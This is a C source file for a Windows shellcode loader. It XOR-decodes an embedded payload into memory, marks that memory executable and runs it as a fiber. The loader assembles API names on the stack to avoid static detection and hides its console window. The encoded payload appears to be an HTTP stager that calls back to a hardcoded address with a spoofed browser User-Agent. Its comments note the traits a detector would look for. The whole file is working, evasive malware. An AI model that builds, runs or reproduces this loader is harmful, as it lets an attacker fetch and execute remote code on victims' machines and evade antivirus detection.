#include <windows.h>
#pragma comment(linker, "/SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup")
// --- GLOBAL SHELLCODE BUFFER ---
// Payload bytes stored XOR-encoded with the single-byte key 0x5A (the same
// constant EntryPoint passes to XorDecrypt). sizeof(encryptedShellcode) is the
// payload length used for the allocation and the protection change below.
// A fixed single-byte XOR is symmetric: applying the key again yields the
// original bytes, so the stored form offers no secrecy against analysis.
unsigned char encryptedShellcode[] = {
    // Encoded form of the original payload; decoded at run time, never at build time.
    0xa6, 0x12, 0xd9, 0xbe, 0xaa, 0xb2, 0x92, 0x5a, 0x5a, 0x5a, 0x1b, 0x0b, 0x1b, 0x0a, 0x08, 0x0b,
    0x0c, 0x12, 0x6b, 0x88, 0x3f, 0x12, 0xd1, 0x08, 0x3a, 0x12, 0xd1, 0x08, 0x42, 0x12, 0xd1, 0x08,
    0x7a, 0x12, 0xd1, 0x28, 0x0a, 0x12, 0x55, 0xed, 0x10, 0x10, 0x17, 0x6b, 0x93, 0x12, 0x6b, 0x9a,
    0xf6, 0x66, 0x3b, 0x26, 0x58, 0x76, 0x7a, 0x1b, 0x9b, 0x93, 0x57, 0x1b, 0x5b, 0x9b, 0xb8, 0xb7,
    0x08, 0x1b, 0x0b, 0x12, 0xd1, 0x08, 0x7a, 0xd1, 0x18, 0x66, 0x12, 0x5b, 0x8a, 0x3c, 0xdb, 0x22,
    0x42, 0x51, 0x58, 0x2f, 0x28, 0xd1, 0xda, 0xd2, 0x5a, 0x5a, 0x5a, 0x12, 0xdf, 0x9a, 0x2e, 0x3d,
    0x12, 0x5b, 0x8a, 0x0a, 0xd1, 0x12, 0x42, 0x1e, 0xd1, 0x1a, 0x7a, 0x13, 0x5b, 0x8a, 0xb9, 0x0c,
    0x12, 0xa5, 0x93, 0x1b, 0xd1, 0x6e, 0xd2, 0x12, 0x5b, 0x8c, 0x17, 0x6b, 0x93, 0x12, 0x6b, 0x9a,
    0xf6, 0x1b, 0x9b, 0x93, 0x57, 0x1b, 0x5b, 0x9b, 0x62, 0xba, 0x2f, 0xab, 0x16, 0x59, 0x16, 0x7e,
    0x52, 0x1f, 0x63, 0x8b, 0x2f, 0x82, 0x02, 0x1e, 0xd1, 0x1a, 0x7e, 0x13, 0x5b, 0x8a, 0x3c, 0x1b,
    0xd1, 0x56, 0x12, 0x1e, 0xd1, 0x1a, 0x46, 0x13, 0x5b, 0x8a, 0x1b, 0xd1, 0x5e, 0xd2, 0x12, 0x5b,
    0x8a, 0x1b, 0x02, 0x1b, 0x02, 0x04, 0x03, 0x00, 0x1b, 0x02, 0x1b, 0x03, 0x1b, 0x00, 0x12, 0xd9,
    0xb6, 0x7a, 0x1b, 0x08, 0xa5, 0xba, 0x02, 0x1b, 0x03, 0x00, 0x12, 0xd1, 0x48, 0xb3, 0x15, 0xa5,
    0xa5, 0xa5, 0x07, 0x30, 0x5a, 0x13, 0xe4, 0x2d, 0x33, 0x34, 0x33, 0x34, 0x3f, 0x2e, 0x5a, 0x1b,
    0x0c, 0x13, 0xd3, 0xbc, 0x16, 0xd3, 0xab, 0x1b, 0xe0, 0x16, 0x2d, 0x7c, 0x5d, 0xa5, 0x8f, 0x12,
    0x6b, 0x93, 0x12, 0x6b, 0x88, 0x17, 0x6b, 0x9a, 0x17, 0x6b, 0x93, 0x1b, 0x0a, 0x1b, 0x0a, 0x1b,
    0xe0, 0x60, 0x0c, 0x23, 0xfd, 0xa5, 0x8f, 0xb1, 0x29, 0x00, 0x12, 0xd3, 0x9b, 0x1b, 0xe2, 0x0a,
    0x5a, 0x5a, 0x5a, 0x17, 0x6b, 0x93, 0x1b, 0x0b, 0x1b, 0x0b, 0x30, 0x59, 0x1b, 0x0b, 0x1b, 0xe0,
    0x0d, 0xd3, 0xc5, 0x9c, 0xa5, 0x8f, 0xb1, 0x03, 0x01, 0x12, 0xd3, 0x9b, 0x12, 0x6b, 0x88, 0x13,
    0xd3, 0x82, 0x17, 0x6b, 0x93, 0x08, 0x32, 0x5a, 0x58, 0x1a, 0xde, 0x08, 0x08, 0x1b, 0xe0, 0xb1,
    0x0f, 0x74, 0x61, 0xa5, 0x8f, 0x12, 0xd3, 0x9c, 0x12, 0xd9, 0x99, 0x0a, 0x30, 0x50, 0x05, 0x12,
    0xd3, 0xab, 0x12, 0xd3, 0x80, 0x13, 0x9d, 0x9a, 0xa5, 0xa5, 0xa5, 0xa5, 0x17, 0x6b, 0x93, 0x08,
    0x08, 0x1b, 0xe0, 0x77, 0x5c, 0x42, 0x21, 0xa5, 0x8f, 0xdf, 0x9a, 0x55, 0xdf, 0xc7, 0x5b, 0x5a,
    0x5a, 0x12, 0xa5, 0x95, 0x55, 0xde, 0xd6, 0x5b, 0x5a, 0x5a, 0xb1, 0x89, 0xb3, 0xbe, 0x5b, 0x5a,
    0x5a, 0xb2, 0xf8, 0xa5, 0xa5, 0xa5, 0x75, 0x2f, 0x08, 0x0e, 0x18, 0x5a, 0x87, 0xe3, 0xa1, 0xa1,
    0x9a, 0xee, 0x20, 0x64, 0x5a, 0xae, 0x3b, 0xa9, 0xc6, 0x18, 0x81, 0x2a, 0xf2, 0x52, 0xf1, 0xc3,
    0xfa, 0x78, 0x70, 0xab, 0x03, 0xf4, 0x81, 0xdc, 0x5c, 0xf8, 0x8d, 0xdc, 0x15, 0x25, 0x14, 0xed,
    0x16, 0x03, 0x64, 0x00, 0x00, 0x07, 0xe1, 0x97, 0x7a, 0xaf, 0x8e, 0x84, 0x69, 0x94, 0x71, 0xb5,
    0xf9, 0x64, 0xcb, 0x9e, 0x46, 0xe2, 0xf5, 0x3b, 0x3f, 0x5d, 0x3d, 0xd8, 0x9e, 0x15, 0xff, 0x0c,
    0x86, 0x3f, 0x27, 0x23, 0x88, 0x5a, 0x0f, 0x29, 0x3f, 0x28, 0x77, 0x1b, 0x3d, 0x3f, 0x34, 0x2e,
    0x60, 0x7a, 0x17, 0x35, 0x20, 0x33, 0x36, 0x36, 0x3b, 0x75, 0x6f, 0x74, 0x6a, 0x7a, 0x72, 0x39,
    0x35, 0x37, 0x2a, 0x3b, 0x2e, 0x33, 0x38, 0x36, 0x3f, 0x61, 0x7a, 0x17, 0x09, 0x13, 0x1f, 0x7a,
    0x63, 0x74, 0x6a, 0x61, 0x7a, 0x0d, 0x33, 0x34, 0x3e, 0x35, 0x2d, 0x29, 0x7a, 0x14, 0x0e, 0x7a,
    0x6c, 0x74, 0x6b, 0x61, 0x7a, 0x0d, 0x15, 0x0d, 0x6c, 0x6e, 0x61, 0x7a, 0x0e, 0x28, 0x33, 0x3e,
    0x3f, 0x34, 0x2e, 0x75, 0x6f, 0x74, 0x6a, 0x61, 0x7a, 0x17, 0x1b, 0x09, 0x0a, 0x73, 0x57, 0x50,
    0x5a, 0xa4, 0x7a, 0x4d, 0x06, 0x44, 0x9b, 0x9e, 0x39, 0xae, 0xd9, 0x9f, 0x10, 0xcf, 0xb6, 0xb4,
    0xb1, 0x2d, 0x83, 0x4a, 0xb5, 0x8c, 0xf0, 0x66, 0xf4, 0x1b, 0xb9, 0xc4, 0x37, 0x1d, 0x25, 0x3a,
    0x87, 0x4f, 0x30, 0xf0, 0x17, 0xec, 0x67, 0x89, 0xf7, 0xc5, 0xe9, 0x46, 0x96, 0x09, 0x61, 0x59,
    0xee, 0xff, 0xab, 0x23, 0x31, 0x7e, 0xf9, 0xfc, 0xff, 0x43, 0x80, 0x9c, 0xeb, 0x72, 0x73, 0xc0,
    0xc3, 0x0c, 0xa6, 0x51, 0x3e, 0xf7, 0x88, 0x9b, 0x68, 0xd8, 0x70, 0xd6, 0x97, 0x01, 0x54, 0x5d,
    0xf4, 0x24, 0xec, 0x7d, 0x45, 0x38, 0x78, 0x0f, 0xe4, 0x42, 0xe0, 0x57, 0xda, 0x5e, 0x19, 0x48,
    0xc1, 0x2f, 0x68, 0x9b, 0xc3, 0xa0, 0x28, 0xcc, 0xe2, 0x89, 0xf3, 0x63, 0x55, 0xcb, 0x95, 0xd9,
    0xc0, 0xd9, 0x35, 0xf4, 0xe7, 0x14, 0x84, 0x81, 0x9a, 0x32, 0x58, 0xa6, 0xc2, 0x3f, 0x90, 0x82,
    0x9e, 0xf2, 0xa2, 0x41, 0xac, 0x79, 0xa7, 0xe9, 0x9a, 0x86, 0xf9, 0x96, 0x61, 0xd7, 0xf1, 0xe9,
    0xe7, 0x2b, 0x2d, 0x2c, 0x71, 0xc7, 0x2a, 0x80, 0x58, 0xb8, 0xf9, 0x77, 0x25, 0xee, 0x17, 0xe8,
    0xf5, 0x84, 0x12, 0xee, 0x7a, 0xcd, 0x54, 0xda, 0x11, 0xf2, 0x16, 0x1b, 0x75, 0xb8, 0x59, 0x32,
    0xb1, 0x86, 0x8a, 0x18, 0x43, 0x05, 0xfd, 0xa8, 0x29, 0xdc, 0x28, 0xf4, 0x35, 0x00, 0x17, 0x31,
    0x26, 0x5c, 0x8a, 0x0d, 0x55, 0x3d, 0xae, 0xae, 0xe8, 0xd6, 0xa2, 0x1e, 0x4f, 0x20, 0x1d, 0xd1,
    0x7e, 0x20, 0x40, 0xe7, 0x23, 0x5a, 0x1b, 0xe4, 0xaa, 0xef, 0xf8, 0x0c, 0xa5, 0x8f, 0x12, 0x6b,
    0x93, 0xe0, 0x5a, 0x5a, 0x1a, 0x5a, 0x1b, 0xe2, 0x5a, 0x4a, 0x5a, 0x5a, 0x1b, 0xe3, 0x1a, 0x5a,
    0x5a, 0x5a, 0x1b, 0xe0, 0x02, 0xfe, 0x09, 0xbf, 0xa5, 0x8f, 0x12, 0xc9, 0x09, 0x09, 0x12, 0xd3,
    0xbd, 0x12, 0xd3, 0xab, 0x12, 0xd3, 0x80, 0x1b, 0xe2, 0x5a, 0x7a, 0x5a, 0x5a, 0x13, 0xd3, 0xa3,
    0x1b, 0xe0, 0x48, 0xcc, 0xd3, 0xb8, 0xa5, 0x8f, 0x12, 0xd9, 0x9e, 0x7a, 0xdf, 0x9a, 0x2e, 0xec,
    0x3c, 0xd1, 0x5d, 0x12, 0x5b, 0x99, 0xdf, 0x9a, 0x2f, 0x8d, 0x02, 0x02, 0x02, 0x12, 0x5f, 0x5a,
    0x5a, 0x5a, 0x5a, 0x0a, 0x99, 0xb2, 0xc5, 0xa7, 0xa5, 0xa5, 0x6b, 0x63, 0x68, 0x74, 0x6b, 0x6c,
    0x62, 0x74, 0x6b, 0x74, 0x6e, 0x5a, 0x60, 0x84, 0x32, 0xeb
};
// --- Function Pointer Typedefs ---
// Signatures of the six kernel32 exports that EntryPoint resolves by name with
// GetProcAddress. Each is declared WINAPI so the raw address returned by the
// lookup can be called with the export's real calling convention. Because the
// names are resolved at run time, none of these six appear in the import
// table; only GetModuleHandleA/GetProcAddress are statically imported.
typedef LPVOID(WINAPI* fnVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);            // VirtualAlloc(addr, size, allocType, protect)
typedef BOOL(WINAPI* fnVirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);           // VirtualProtect(addr, size, newProtect, &oldProtect)
typedef LPVOID(WINAPI* fnConvertThreadToFiber)(LPVOID);                          // ConvertThreadToFiber(fiberData)
typedef LPVOID(WINAPI* fnCreateFiber)(SIZE_T, LPFIBER_START_ROUTINE, LPVOID);    // CreateFiber(stackSize, startRoutine, param)
typedef VOID(WINAPI* fnSwitchToFiber)(LPVOID);                                   // SwitchToFiber(fiber)
typedef VOID(WINAPI* fnExitProcess)(UINT);                                       // ExitProcess(exitCode)
// --- Main Logic ---
/*
 * Apply a single-byte XOR to `size` bytes: data_out[i] = data_in[i] ^ key.
 *
 * The transform is its own inverse, so the same call both encodes and decodes.
 * In-place use (data_in == data_out) is safe because each byte is read before
 * its output is written. A size of 0 is a no-op.
 *
 * data_in  - source bytes (at least `size` readable)
 * data_out - destination bytes (at least `size` writable)
 * size     - number of bytes to transform
 * key      - the XOR constant applied to every byte
 */
VOID XorDecrypt(unsigned char* data_in, unsigned char* data_out, size_t size, unsigned char key) {
    const unsigned char* src = data_in;
    const unsigned char* const end = data_in + size;
    unsigned char* dst = data_out;
    while (src != end) {
        *dst = (unsigned char)(*src ^ key);
        ++src;
        ++dst;
    }
}
/*
 * Loader entry: resolves six kernel32 exports by name at run time, decodes the
 * global buffer into a fresh private allocation, changes that allocation from
 * PAGE_READWRITE to PAGE_EXECUTE_READWRITE and transfers control to it as a
 * fiber. Every failure after the lookups calls ExitProcess with a distinct
 * exit code (1..4); the function returns early without exiting only when
 * kernel32 or one of its exports cannot be resolved.
 *
 * Behaviour relevant to detection and analysis (all visible below):
 *  - GetModuleHandleA and GetProcAddress are called directly, so they remain
 *    in the import table even though the six other APIs do not.
 *  - The region is allocated RW and later flipped to RWX via VirtualProtect;
 *    the previous protection is captured but never restored.
 *  - The fiber start routine is the decoded heap-style buffer, i.e. a code
 *    pointer into a private, non-image region.
 * ExitProcess does not return to the caller, so the statement following each
 * failure branch is never reached on that path.
 */
VOID EntryPoint() {
    // Obfuscate strings on the stack
    // Each API name is assembled byte-by-byte into a stack array rather than
    // stored as one contiguous string literal in the image.
    char k32_str[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', 0 };
    char va_str[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0 };
    char vp_str[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't', 0 };
    char cttf_str[] = { 'C', 'o', 'n', 'v', 'e', 'r', 't', 'T', 'h', 'r', 'e', 'a', 'd', 'T', 'o', 'F', 'i', 'b', 'e', 'r', 0 };
    char cf_str[] = { 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'b', 'e', 'r', 0 };
    char stf_str[] = { 'S', 'w', 'i', 't', 'c', 'h', 'T', 'o', 'F', 'i', 'b', 'e', 'r', 0 };
    char ep_str[] = { 'E', 'x', 'i', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 0 };
    // Get kernel32.dll module handle
    // Uses the already-loaded module; no LoadLibrary call is made here.
    HMODULE hKernel32 = GetModuleHandleA(k32_str);
    if (!hKernel32) return;
    // Dynamically load function pointers
    // Plain returns (no ExitProcess) on failure: pExitProcess is not yet known
    // to be valid at this point.
    fnVirtualAlloc pVirtualAlloc = (fnVirtualAlloc)GetProcAddress(hKernel32, va_str);
    fnVirtualProtect pVirtualProtect = (fnVirtualProtect)GetProcAddress(hKernel32, vp_str);
    fnConvertThreadToFiber pConvertThreadToFiber = (fnConvertThreadToFiber)GetProcAddress(hKernel32, cttf_str);
    fnCreateFiber pCreateFiber = (fnCreateFiber)GetProcAddress(hKernel32, cf_str);
    fnSwitchToFiber pSwitchToFiber = (fnSwitchToFiber)GetProcAddress(hKernel32, stf_str);
    fnExitProcess pExitProcess = (fnExitProcess)GetProcAddress(hKernel32, ep_str);
    if (!pVirtualAlloc || !pVirtualProtect || !pConvertThreadToFiber || !pCreateFiber || !pSwitchToFiber || !pExitProcess) {
        return;
    }
    // Allocate memory for the decrypted shellcode
    // Sized from the encoded array; initially RW only.
    LPVOID pShellcodeAddress = pVirtualAlloc(NULL, sizeof(encryptedShellcode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pShellcodeAddress == NULL) {
        pExitProcess(1);
    }
    // Decrypt the shellcode with the hardcoded key
    // 0x5A is the same constant named in the buffer's comment; the global
    // array itself is left in its encoded form.
    XorDecrypt(encryptedShellcode, (unsigned char*)pShellcodeAddress, sizeof(encryptedShellcode), 0x5A);
    // Change memory protection to be executable
    // RW -> RWX on a private allocation. dwOldProtection receives the prior
    // value but is not used afterwards.
    DWORD dwOldProtection = 0;
    if (!pVirtualProtect(pShellcodeAddress, sizeof(encryptedShellcode), PAGE_EXECUTE_READWRITE, &dwOldProtection)) {
        pExitProcess(2);
    }
    // Execute shellcode via Fibers
    // The calling thread must itself be a fiber before CreateFiber/SwitchToFiber
    // can be used; the returned handle is the fiber for this thread.
    LPVOID pPrimaryFiber = pConvertThreadToFiber(NULL);
    if (!pPrimaryFiber) {
        pExitProcess(3);
    }
    // Stack size 0 selects the default; the start routine is the decoded buffer.
    LPVOID pShellcodeFiber = pCreateFiber(0, (LPFIBER_START_ROUTINE)pShellcodeAddress, NULL);
    if (!pShellcodeFiber) {
        pExitProcess(4);
    }
    // Transfers control to the new fiber; execution only comes back here if
    // that fiber switches back to pPrimaryFiber.
    pSwitchToFiber(pShellcodeFiber);
    pExitProcess(0);
}